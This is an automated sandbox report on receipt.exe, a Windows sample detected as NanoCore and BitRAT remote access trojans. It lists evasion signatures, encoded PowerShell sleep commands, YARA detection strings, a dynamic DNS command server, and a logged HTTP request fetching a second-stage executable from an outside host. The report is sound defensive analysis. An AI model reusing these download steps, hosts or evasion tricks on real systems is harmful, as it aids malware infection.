Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
receipt.exe

Overview

General Information

Sample Name:receipt.exe
Analysis ID:712166
MD5:220925c99e482fd480dedb37ca1b59d3
SHA1:828278c1467af367892469cbced139533ecce7e1
SHA256:e2340403396069b5ca3a235a66889abf2540c8e382bff1cb704ef2cdb13dade9
Tags:exeNanoCoreRAT
Infos:

Detection

Nanocore, BitRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected BitRAT
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Detected Nanocore Rat
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Yara detected Nanocore RAT
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • receipt.exe (PID: 4184 cmdline: "C:\Users\user\Desktop\receipt.exe" MD5: 220925C99E482FD480DEDB37CA1B59D3)
    • powershell.exe (PID: 3680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • receipt.exe (PID: 5792 cmdline: C:\Users\user\Desktop\receipt.exe MD5: 220925C99E482FD480DEDB37CA1B59D3)
    • receipt.exe (PID: 5804 cmdline: C:\Users\user\Desktop\receipt.exe MD5: 220925C99E482FD480DEDB37CA1B59D3)
      • powershell.exe (PID: 6052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Rzqhcgbd1time.exe (PID: 4204 cmdline: "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe" MD5: 75C8427471203E42A905F099D986BAE4)
      • receipt.exe (PID: 1840 cmdline: C:\Users\user\Desktop\receipt.exe MD5: 220925C99E482FD480DEDB37CA1B59D3)
  • Uewizrlgm.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe" MD5: 220925C99E482FD480DEDB37CA1B59D3)
    • powershell.exe (PID: 3920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Uewizrlgm.exe (PID: 5140 cmdline: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe MD5: 220925C99E482FD480DEDB37CA1B59D3)
  • Uewizrlgm.exe (PID: 5988 cmdline: "C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe" MD5: 220925C99E482FD480DEDB37CA1B59D3)
    • powershell.exe (PID: 5444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Uewizrlgm.exe (PID: 1800 cmdline: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe MD5: 220925C99E482FD480DEDB37CA1B59D3)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exeJoeSecurity_BitRATYara detected BitRATJoe Security
    C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exeMALWARE_Win_BitRATDetects BitRAT RATditekSHen
    • 0x339ffc:$s1: \plg\
    • 0x33a170:$s3: files_delete
    • 0x338f8c:$s9: ddos_stop
    • 0x339fdc:$s10: socks5_srv_start
    • 0x33a1bc:$s16: klg|
    • 0x338fbc:$s17: Slowloris
    • 0x33a064:$s18: Bot ID:
    • 0x33a5a4:$t1: <sz>N/A</sz>
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exeJoeSecurity_BitRATYara detected BitRATJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exeMALWARE_Win_BitRATDetects BitRAT RATditekSHen
      • 0x339ffc:$s1: \plg\
      • 0x33a170:$s3: files_delete
      • 0x338f8c:$s9: ddos_stop
      • 0x339fdc:$s10: socks5_srv_start
      • 0x33a1bc:$s16: klg|
      • 0x338fbc:$s17: Slowloris
      • 0x33a064:$s18: Bot ID:
      • 0x33a5a4:$t1: <sz>N/A</sz>
      SourceRuleDescriptionAuthorStrings
      0000000C.00000003.354725575.0000000004133000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x33a2d:$x1: NanoCore.ClientPluginHost
          • 0x33a6a:$x2: IClientNetworkHost
          • 0x3759d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
          • 0x33795:$a: NanoCore
          • 0x337a5:$a: NanoCore
          • 0x339d9:$a: NanoCore
          • 0x339ed:$a: NanoCore
          • 0x33a2d:$a: NanoCore
          • 0x337f4:$b: ClientPlugin
          • 0x339f6:$b: ClientPlugin
          • 0x33a36:$b: ClientPlugin
          • 0x3391b:$c: ProjectData
          • 0x34322:$d: DESCrypto
          • 0x35ed7:$i: get_Connected
          • 0x34658:$j: #=q
          • 0x34688:$j: #=q
          • 0x346a4:$j: #=q
          • 0x346d4:$j: #=q
          • 0x346f0:$j: #=q
          • 0x3470c:$j: #=q
          • 0x3473c:$j: #=q
          • 0x34758:$j: #=q
          • 0x3479c:$j: #=q
          • 0x347b8:$j: #=q
          0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Nanocore_d8c4e3c5unknownunknown
          • 0x33a2d:$a1: NanoCore.ClientPluginHost
          • 0x339ed:$a2: NanoCore.ClientPlugin
          • 0x35946:$b1: get_BuilderSettings
          • 0x33849:$b2: ClientLoaderForm.resources
          • 0x35066:$b3: PluginCommand
          • 0x33a1e:$b4: IClientAppHost
          • 0x35f9e:$b6: AddHostEntry
          • 0x35f0b:$b8: PipeExists
          • 0x33a57:$b9: IClientLoggingHost
          Click to see the 47 entries
          SourceRuleDescriptionAuthorStrings
          12.2.receipt.exe.3f72bc0.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0x1018d:$x1: NanoCore.ClientPluginHost
          • 0x101ca:$x2: IClientNetworkHost
          • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          12.2.receipt.exe.3f72bc0.3.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
          • 0xff05:$x1: NanoCore Client.exe
          • 0x1018d:$x2: NanoCore.ClientPluginHost
          • 0x117c6:$s1: PluginCommand
          • 0x117ba:$s2: FileCommand
          • 0x1266b:$s3: PipeExists
          • 0x18422:$s4: PipeCreated
          • 0x101b7:$s5: IClientLoggingHost
          12.2.receipt.exe.3f72bc0.3.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
            12.2.receipt.exe.3f72bc0.3.raw.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
            • 0xfef5:$x1: NanoCore Client
            • 0xff05:$x1: NanoCore Client
            • 0x1014d:$x2: NanoCore.ClientPlugin
            • 0x1018d:$x3: NanoCore.ClientPluginHost
            • 0x10142:$i1: IClientApp
            • 0x10163:$i2: IClientData
            • 0x1016f:$i3: IClientNetwork
            • 0x1017e:$i4: IClientAppHost
            • 0x101a7:$i5: IClientDataHost
            • 0x101b7:$i6: IClientLoggingHost
            • 0x101ca:$i7: IClientNetworkHost
            • 0x101dd:$i8: IClientUIHost
            • 0x101eb:$i9: IClientNameObjectCollection
            • 0x10207:$i10: IClientReadOnlyNameObjectCollection
            • 0xff54:$s1: ClientPlugin
            • 0x10156:$s1: ClientPlugin
            • 0x1064a:$s2: EndPoint
            • 0x10653:$s3: IPAddress
            • 0x1065d:$s4: IPEndPoint
            • 0x12093:$s6: get_ClientSettings
            • 0x12637:$s7: get_Connected
            12.2.receipt.exe.3f72bc0.3.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
            • 0xfef5:$a: NanoCore
            • 0xff05:$a: NanoCore
            • 0x10139:$a: NanoCore
            • 0x1014d:$a: NanoCore
            • 0x1018d:$a: NanoCore
            • 0xff54:$b: ClientPlugin
            • 0x10156:$b: ClientPlugin
            • 0x10196:$b: ClientPlugin
            • 0x1007b:$c: ProjectData
            • 0x10a82:$d: DESCrypto
            • 0x1844e:$e: KeepAlive
            • 0x1643c:$g: LogClientMessage
            • 0x12637:$i: get_Connected
            • 0x10db8:$j: #=q
            • 0x10de8:$j: #=q
            • 0x10e04:$j: #=q
            • 0x10e34:$j: #=q
            • 0x10e50:$j: #=q
            • 0x10e6c:$j: #=q
            • 0x10e9c:$j: #=q
            • 0x10eb8:$j: #=q
            Click to see the 66 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: receipt.exeAvira: detected
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeAvira: detection malicious, Label: ADWARE/FileFinder.Gen7
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exeAvira: detection malicious, Label: TR/Redcap.cskpb
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeAvira: detection malicious, Label: HEUR/AGEN.1231952
            Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exeAvira: detection malicious, Label: TR/Redcap.cskpb
            Source: C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exeAvira: detection malicious, Label: HEUR/AGEN.1231952
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR
            Source: receipt.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exeJoe Sandbox ML: detected
            Source: 26.0.receipt.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: time[1].exe.25.drBinary or memory string: -----BEGIN PUBLIC KEY-----
            Source: receipt.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: receipt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp

            Networking

            barindex
            Source: unknownDNS query: name: uzu.duckdns.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Sep 2022 22:54:15 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Mon, 12 Sep 2022 12:14:40 GMTAccept-Ranges: bytesContent-Length: 8177152Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fa 95 65 d9 be f4 0b 8a be f4 0b 8a be f4 0b 8a 0a 68 fa 8a a0 f4 0b 8a 0a 68 f8 8a 79 f4 0b 8a 0a 68 f9 8a 9a f4 0b 8a 20 54 cc 8a b8 f4 0b 8a 85 aa 08 8b a2 f4 0b 8a 29 86 0f 8b d9 f5 0b 8a 29 aa 0e 8b b4 f4 0b 8a 29 aa 0f 8b e2 f4 0b 8a 63 0b db 8a ba f4 0b 8a 63 0b da 8a bf f4 0b 8a 63 0b c0 8a bd f4 0b 8a be f4 0a 8a fb f6 0b 8a 5b ad 0e 8b bc f4 0b 8a 63 0b c5 8a bb f4 0b 8a 85 aa 0f 8b 94 f4 0b 8a 85 aa 0e 8b 3b f4 0b 8a 29 aa 02 8b 34 f4 0b 8a 2c aa f4 8a bf f4 0b 8a 29 aa 09 8b bf f4 0b 8a 52 69 63 68 be f4 0b 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c4 d4 db 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e2 2d 00 00 e0 4e 00 00 00 00 00 52 97 28 00 00 10 00 00 00 00 2e 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 7d 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a8 38 00 28 00 00 00 00 90 3a 00 28 9c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 7b 00 cc 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 95 34 00 18 00 00 00 d0 a0 32 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 00 d8 03 00 00 5c 8b 38 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3d e1 2d 00 00 10 00 00 00 e2 2d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 bf 0a 00 00 00 2e 00 00 c0 0a 00 00 e6 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 9c 01 00 00 c0 38 00 00 22 01 00 00 a6 38 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 11 00 00 00 60 3a 00 00 12 00 00 00 c8 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 80 3a 00 00 02 00 00 00 da 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 40 00 00 90 3a 00 00 9e 40 00 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 4a 02 00 00 30 7b 00 00 4c 02 00 00 7a 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /time.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: servproviders.com.brConnection: Keep-Alive
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
